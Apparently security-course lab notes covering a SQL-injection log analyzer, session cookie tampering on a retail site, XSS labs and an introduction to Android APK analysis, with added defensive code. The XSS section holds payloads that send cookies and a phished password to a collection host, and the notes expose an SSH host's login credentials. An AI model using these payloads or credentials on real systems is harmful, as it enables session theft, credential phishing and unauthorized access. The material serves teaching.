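        if not match:
            continue
        ip, _method, target, _status, seconds = match.groups()
        # Decode the query string so %20 and + cannot hide the keywords.
        query = unquote_plus(urlsplit(target).query)
        hits = {name for name, rx in SIGNATURES.items() if rx.search(query)}
        if not hits:
            continue
        entry = report.setdefault(ip, {"signatures": set(),
                                       "order_by_values": set(),
                                       "delay_confirmed": False})
        entry["signatures"] |= hits
        entry["order_by_values"].update(int(n) for n in ORDER_BY.findall(query))
        if "time_delay" in hits and float(seconds) >= DELAY_SECONDS:
            entry["delay_confirmed"] = True
    return report


def verdict(entry):
    """Rank one client's activity (labels are assumptions for this example)."""
    if entry["delay_confirmed"] or "union_select" in entry["signatures"]:
        return "investigate-now"
    if len(entry["order_by_values"]) >= 3:
        return "column-enumeration"
    return "probe"


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, verdict(entry), sorted(entry["signatures"]),
              sorted(entry["order_by_values"]))
```

The response-time column is what separates a WAITFOR probe that did nothing from one that actually ran, so it is worth logging request duration on database-backed pages.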
  2091.  
  2092.  
  2093.  
  2094.  
  2095.  
  2096.  
  2097.  
  2098. ################################
  2099. # Playing with session cookies #
  2100. ################################
  2101.  
  2102. -----------------------------------------------------------------------
  2103. Step 1: Browse to the shopping cart page NewEgg.com
  2104. -------------------Browse to this webpage in Firefox------------------------------
  2105. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
  2106. ----------------------------------------------------------------------------------
  2107.  
  2108.  
  2109.  
  2110. Step 2: View the current session ID
---Type this over the shopping cart URL in the address bar (don't paste it)---------
  2112. javascript:void(document.write(document.cookie))
  2113. ------------------------------------------------------------------------------------
  2114.  
You should see your session cookie. If you don't, try again in a different browser.
  2116.  
  2117.  
  2118.  
  2119. Step 3: Go back to the shopping cart page (click the back button)
  2120. ---------------------------------------------------------------------------------
  2121. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
  2122. ---------------------------------------------------------------------------------
  2123.  
  2124.  
  2125. Step 4: Now let's modify the session ID
---Type this over the shopping cart URL in the address bar (don't paste it)---------
  2127. javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
  2128. ------------------------------------------------------------------------------------
  2129.  
  2130.  
  2131.  
  2132. Step 5: Go back to the shopping cart page (click the back button)
  2133. ---------------------------------------------------------------------------------
  2134. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
  2135. ---------------------------------------------------------------------------------
  2136.  
  2137.  
  2138.  
  2139. Step 6: View the current session ID
---Type this over the shopping cart URL in the address bar (don't paste it)---------
  2141. javascript:void(document.write(document.cookie))
  2142. ------------------------------------------------------------------------------------
  2143.  
  2144. -----------------------------------------------------------------------
  2145.  
  2146. #########################################################
  2147. # What is XSS #
  2148. # https://phpapp.infosecaddicts.com/2-Intro_To_XSS.pptx #
  2149. #########################################################
  2150.  
  2151. OK - what is Cross Site Scripting (XSS)
  2152.  
  2153. 1. Use Firefox to browse to the following location:
  2154. ---------------------------Type This-----------------------------------
  2155.  
  2156. https://phpapp.infosecaddicts.com/xss_practice/
  2157. -----------------------------------------------------------------------
  2158.  
  2159. A really simple search page that is vulnerable should come up.
  2160.  
  2161.  
  2162.  
  2163.  
  2164. 2. In the search box type:
  2165. ---------------------------Type This-----------------------------------
  2166.  
  2167. <script>alert('So this is XSS')</script>
  2168. -----------------------------------------------------------------------
  2169.  
  2170.  
This should pop up an alert window with your message in it, proving XSS is in fact possible.
  2172. Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/
  2173.  
  2174.  
  2175. 3. In the search box type:
  2176. ---------------------------Type This-----------------------------------
  2177.  
  2178. <script>alert(document.cookie)</script>
  2179. -----------------------------------------------------------------------
  2180.  
  2181.  
This should pop up an alert window with your cookie in it, proving XSS is in fact possible and your cookie can be accessed.
  2183. Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/
  2184.  
  2185. 4. Now replace that alert script with:
  2186. ---------------------------Type This-----------------------------------
  2187.  
  2188. <script>document.location="https://phpapp.infosecaddicts.com/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  2189. -----------------------------------------------------------------------
  2190.  
  2191.  
  2192. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  2193.  
  2194.  
  2195. 5. Now view the stolen cookie at:
  2196. ---------------------------Type This-----------------------------------
  2197.  
  2198. https://phpapp.infosecaddicts.com/xss_practice/cookie_stealer_logs.html
  2199. -----------------------------------------------------------------------
  2200.  
  2201.  
  2202. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
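
Added example (not from the original notes): the search page's reflection bug beside its fix, plus response headers that keep the session cookie out of reach of document.cookie. The page template, the cookie name PHPSESSID and the header values are assumptions; the payload is the one from step 3.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Payload from step 3 above.
PAYLOAD = "<script>alert(document.cookie)</script>"

# Assumed shape of the search results page.
PAGE = "<html><body><h1>Search</h1><p>You searched for: {term}</p></body></html>"


def render_reflected(term):
    """The 'before': the search term is copied into the HTML as-is."""
    return PAGE.format(term=term)


def render_encoded(term):
    """The fix: encode for the HTML context before writing the value out."""
    return PAGE.format(term=html.escape(term, quote=True))


class ScriptCounter(HTMLParser):
    """Counts <script> elements the way an HTML parser sees the markup."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_scripts(markup):
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


def session_headers(session_id):
    """Response headers that limit what an injected script can reach."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id          # cookie name is an assumption
    cookie["PHPSESSID"]["path"] = "/"
    cookie["PHPSESSID"]["httponly"] = True    # not exposed to document.cookie
    cookie["PHPSESSID"]["secure"] = True      # only sent over HTTPS
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return [
        ("Set-Cookie", cookie["PHPSESSID"].OutputString()),
        # No 'unsafe-inline', so inline <script> blocks are not executed.
        ("Content-Security-Policy", "default-src 'self'; script-src 'self'"),
    ]


if __name__ == "__main__":
    print("reflected:", count_scripts(render_reflected(PAYLOAD)), "script element(s)")
    print("encoded:  ", count_scripts(render_encoded(PAYLOAD)), "script element(s)")
    for name, value in session_headers("abc123"):
        print(f"{name}: {value}")
```

Output encoding is the fix for the bug itself; HttpOnly and the Content-Security-Policy header only reduce what a missed injection point can do.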
  2203.  
  2204.  
  2205.  
  2206.  
  2207.  
  2208.  
  2209. ############################
  2210. # A Better Way To Demo XSS #
  2211. ############################
  2212.  
  2213.  
  2214. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  2215.  
  2216.  
  2217. Use Firefox to browse to the following location:
  2218. ---------------------------Type This-----------------------------------
  2219.  
  2220. https://phpapp.infosecaddicts.com/xss_practice/
  2221. -----------------------------------------------------------------------
  2222.  
  2223.  
  2224.  
  2225. Paste this in the search box
  2226. ----------------------------
  2227.  
  2228.  
  2229. ---------------------------Type This-----------------------------------
  2230.  
  2231. <script>
  2232. password=prompt('Your session is expired. Please enter your password to continue',' ');
  2233. document.write("<img src=\"https://phpapp.infosecaddicts.com/xss_practice/passwordgrabber.php?password=" +password+"\">");
  2234. </script>
  2235. -----------------------------------------------------------------------
  2236.  
  2237.  
  2238. Now view the stolen password at:
  2239. ---------------------------Type This-----------------------------------
  2240.  
  2241. https://phpapp.infosecaddicts.com/xss_practice/passwords.html
  2242.  
  2243. -----------------------------------------------------------------------
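Why both payloads above run, and what stops them, as an added example that is not part of the original notes. The two render functions are hypothetical stand-ins for the lab's search page, and the cookie name PHPSESSID is an assumption.

```python
import html
from http.cookies import SimpleCookie

# Payloads from this page (the prompt one is abridged to its first statement).
PAYLOADS = {
    "cookie": '<script>document.location="https://phpapp.infosecaddicts.com/xss_practice/'
              'cookie_catcher.php?c="+document.cookie</script>',
    "prompt": "<script>password=prompt('Your session is expired. Please enter your "
              "password to continue',' ');</script>",
}

def render_vulnerable(term):
    # Hypothetical search page: the term is reflected into the HTML unchanged,
    # so the browser parses the <script> element and runs it.
    return "<p>Results for: " + term + "</p>"

def render_escaped(term):
    # Output encoding: <, >, &, " and ' become entities, so the same input
    # is displayed as text instead of being parsed as markup.
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"

def session_cookie_header(session_id):
    # HttpOnly hides the cookie from document.cookie, Secure keeps it off
    # plain HTTP, SameSite limits when it is sent on cross-site requests.
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id  # assumed cookie name
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "| vulnerable:", render_vulnerable(payload))
        print(name, "| escaped:   ", render_escaped(payload))
    print(session_cookie_header("abc123"))
```

HttpOnly only removes the session cookie from what the first payload can read. The password prompt never touches the cookie, so only the output encoding stops it.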
  2244.  
  2245.  
  2246.  
  2247. ###########################
  2248. # Mobile Malware Analysis #
  2249. ###########################
  2250. sudo apt install -y androguard android-platform-tools-base apktool split-select google-android-build-tools-installer
  2251.  
  2252. Open IDLE, and let's just dive right in.
  2253.  
  2254.  
  2255. - I prefer to use Putty to SSH into my Linux host.
  2256. - You can download Putty from here:
  2257. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  2258.  
  2259. Here is the information to put into putty
  2260.  
  2261. Host Name: 107.191.39.106
  2262. protocol: ssh
  2263. port: 22
  2264. username: sempra
  2265. password: semprapython3!
  2266.  
  2267.  
  2268.  
  2269.  
  2270. What is an APK?
  2271. An Android application is packaged as an APK ( Android Package ) file, which is essentially a ZIP file containing the compiled code, the resources, signature, manifest and every other file the software needs in order to run. Since it is a ZIP file, we can start looking at its contents using the unzip command line utility ( or any other unarchiver you use ):
  2272.  
  2273. ---------------------------Type This-----------------------------------
  2274. cd android_malware
  2275. unzip application.apk -d yourname
  2276. -----------------------------------------------------------------------
  2277.  
  2278. Here’s what you will find inside an APK.
  2279.  
  2280. ---------------------------Type This-----------------------------------
  2281. cd yourname
  2282. ls
  2283. -----------------------------------------------------------------------
  2284.  
  2285. - AndroidManifest.xml (file)
  2286. This is the binary representation of the XML manifest file describing what permissions the application will request (keep in mind that some of the permissions might be requested at runtime by the app and not declared here), what activities ( GUIs ) are in there, what services ( stuff running in the background with no UI ) and what receivers ( classes that can receive and handle system events such as the device boot or an incoming SMS ).
  2287.  
  2288. Once decompiled (more on this later), it’ll look like this:
  2289.  
  2290. <?xml version="1.0" encoding="utf-8" standalone="no"?>
  2291. <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.company.appname"
  2292. platformBuildVersionCode="24"
  2293. platformBuildVersionName="7.0">
  2294. <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  2295. <uses-permission android:name="android.permission.INTERNET"/>
  2296.  
  2297. <application android:allowBackup="true" android:icon="@mipmap/ic_launcher"
  2298. android:label="@string/app_name"
  2299. android:supportsRtl="true" android:theme="@style/AppTheme">
  2300. <activity android:name="com.company.appname.MainActivity">
  2301. <intent-filter>
  2302. <action android:name="android.intent.action.MAIN"/>
  2303. <category android:name="android.intent.category.LAUNCHER"/>
  2304. </intent-filter>
  2305. </activity>
  2306. </application>
  2307.  
  2308. </manifest>
  2309. Keep in mind that this is the perfect starting point to isolate the application “entry points”, namely the classes you’ll reverse first in order to understand the logic of the whole software. In this case, for instance, we would start by inspecting the com.company.appname.MainActivity class, since it is declared as the main UI for the application.
  2310.  
  2311.  
  2312. ---------------------------Type This-----------------------------------
  2313. cd assets
  2314. ls
  2315. -----------------------------------------------------------------------
  2316. - assets/* ( folder )
  2317. This folder will contain application specific files, like wav files the app might need to play, custom fonts and so on. Reversing-wise it’s usually not very important, unless of course you find inside the software functional references to such files.
  2318.  
  2319.  
  2320. ---------------------------Type This-----------------------------------
  2321. cd ../res
  2322. ls
  2323. -----------------------------------------------------------------------
  2324.  
  2325.  
  2326. - res/* ( folder )
  2327. All the resources, like the activities xml files, images and custom styles are stored here.
  2328.  
  2329. ---------------------------Type This-----------------------------------
  2330. cd ../
  2331. ls
  2332. -----------------------------------------------------------------------
  2333.  
  2334.  
  2335. - resources.arsc ( file )
  2336. This is the “index” of all the resources. Long story short, each resource file is assigned a numeric identifier that the app will use in order to identify that specific entry, and the resources.arsc file maps these files to their identifiers … nothing very interesting about it.
  2337.  
  2338. - classes.dex ( file )
  2339. This file contains the Dalvik ( the virtual machine running Android applications ) bytecode of the app. Let me explain it better. An Android application is (most of the time) developed using the Java programming language. The Java source files are then compiled into this bytecode, which the Dalvik VM will eventually execute … pretty much what happens to normal Java programs when they’re compiled to .class files.
  2340.  
  2341. Long story short, this file contains the logic, and that’s what we’re interested in.
  2342.  
  2343. Sometimes you’ll also find a classes2.dex file. This is due to the DEX format, which has a limit on the number of classes you can declare inside a single dex file. At some point in history Android apps became bigger and bigger, so Google had to adapt this format, supporting a secondary .dex file where other classes can be declared.
  2344.  
  2345. From our perspective it doesn’t matter, the tools we’re going to use are able to detect it and append it to the decompilation pipeline.
  2346.  
  2347. - libs/ ( folder )
  2348. Sometimes an app needs to execute native code: it can be an image processing library, a game engine or whatever. In such cases, those .so ELF libraries will be found inside the libs folder, divided into architecture specific subfolders ( so the app will run on ARM, ARM64, x86, etc ).
  2349.  
  2350.  
  2351. ---------------------------Type This-----------------------------------
  2352. cd META-INF/
  2353. ls
  2354. -----------------------------------------------------------------------
  2355.  
  2356.  
  2357.  
  2358. - META-INF/ ( folder )
  2359. Every Android application needs to be signed with a developer certificate in order to run on a device; even debug builds are signed by a debug certificate. The META-INF folder contains information about the files inside the APK and about the developer.
  2360.  
  2361. Inside this folder, you’ll usually find:
  2362.  
  2363. A MANIFEST.MF file with the SHA-1 or SHA-256 hashes of all the files inside the APK.
  2364. A CERT.SF file, pretty much like the MANIFEST.MF, but signed with the RSA key.
  2365. A CERT.RSA file which contains the developer public key used to sign the CERT.SF file and digests.
  2366. Those files are very important in order to guarantee the APK integrity and the ownership of the code. Sometimes inspecting the signature can be very handy to determine who really developed a given APK. If you want to get information about the developer, you can use the openssl command line utility:
  2367.  
  2368. ---------------------------Type This-----------------------------------
  2369. openssl pkcs7 -in CERT.RSA -inform DER -print
  2370. -----------------------------------------------------------------------
  2371. This will print an output like:
  2372.  
  2373. PKCS7:
  2374. type: pkcs7-signedData (1.2.840.113549.1.7.2)
  2375. d.sign:
  2376. version: 1
  2377. md_algs:
  2378. algorithm: sha1 (1.3.14.3.2.26)
  2379. parameter: NULL
  2380. contents:
  2381. type: pkcs7-data (1.2.840.113549.1.7.1)
  2382. d.data: <ABSENT>
  2383. cert:
  2384. cert_info:
  2385. version: 2
  2386. serialNumber: 10394279457707717180
  2387. signature:
  2388. algorithm: sha1WithRSAEncryption (1.2.840.113549.1.1.5)
  2389. parameter: NULL
  2390. issuer: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com
  2391. validity:
  2392. notBefore: Jul 8 11:39:39 2013 GMT
  2393. notAfter: Nov 23 11:39:39 2040 GMT
  2394. subject: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com
  2395. key:
  2396. algor:
  2397. algorithm: rsaEncryption (1.2.840.113549.1.1.1)
  2398. parameter: NULL
  2399. public_key: (0 unused bits)
  2400. ...
  2401. ...
  2402. ...
  2403. This can be gold for us. For instance, we could use this information to determine if an app was really signed by (let’s say) Google or if it was re-signed, and therefore modified, by a third party.
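The MANIFEST.MF digests described above can be checked against the files actually present in the APK. This is an added example, not part of the original notes; the sample archive is constructed in memory with placeholder file contents.

```python
import base64, hashlib, io, zipfile

ALGS = {"SHA1-Digest": "sha1", "SHA-256-Digest": "sha256"}

def b64_digest(alg, body):
    return base64.b64encode(hashlib.new(alg, body).digest()).decode()

def parse_manifest(text):
    """Return {entry name: (hash name, base64 digest)} from MANIFEST.MF text."""
    # Lines over 72 bytes are wrapped; a continuation line starts with one space.
    text = text.replace("\r\n", "\n").replace("\n ", "")
    entries = {}
    for section in text.split("\n\n"):
        attrs = dict(l.split(": ", 1) for l in section.splitlines() if ": " in l)
        for key, alg in ALGS.items():
            if "Name" in attrs and key in attrs:
                entries[attrs["Name"]] = (alg, attrs[key])
    return entries

def audit_apk(data):
    """Check every packaged file against the digests recorded in MANIFEST.MF."""
    report = {"modified": [], "unlisted": [], "missing": []}
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        listed = parse_manifest(apk.read("META-INF/MANIFEST.MF").decode("utf-8"))
        # MANIFEST.MF, CERT.SF and CERT.RSA are not listed in the manifest itself.
        names = [n for n in apk.namelist()
                 if not n.startswith("META-INF/") and not n.endswith("/")]
        for name in names:
            if name not in listed:
                report["unlisted"].append(name)   # added after signing
            elif b64_digest(listed[name][0], apk.read(name)) != listed[name][1]:
                report["modified"].append(name)   # content changed after signing
        report["missing"] = sorted(set(listed) - set(names))
    return report

def build_sample(tamper=False):
    """Constructed stand-in for an APK: tiny placeholder files, not a real app."""
    files = {"AndroidManifest.xml": b"<binary xml>", "classes.dex": b"dex sample"}
    manifest = "Manifest-Version: 1.0\r\n\r\n"
    for name, body in files.items():
        manifest += "Name: %s\r\nSHA-256-Digest: %s\r\n\r\n" % (name, b64_digest("sha256", body))
    if tamper:  # simulate repackaging without regenerating the manifest
        files["classes.dex"] += b" patched"
        files["classes2.dex"] = b"extra dex"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        for name, body in files.items():
            z.writestr(name, body)
    return buf.getvalue()
```

A clean result only shows that the files match the manifest. Anyone who repackages an APK can regenerate the manifest and re-sign, which is why the certificate in CERT.RSA still has to be compared with the expected developer.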
  2404.  
  2405. ---------------------------Type This-----------------------------------
  2406. sh /home/sempra/dex2jar-2.0/d2j-dex2jar.sh classes.dex
  2407. -----------------------------------------------------------------------
  2408.  
  2409.  
  2410. Download via SCP the classes.dex.jar file to your local machine. Then install JD-GUI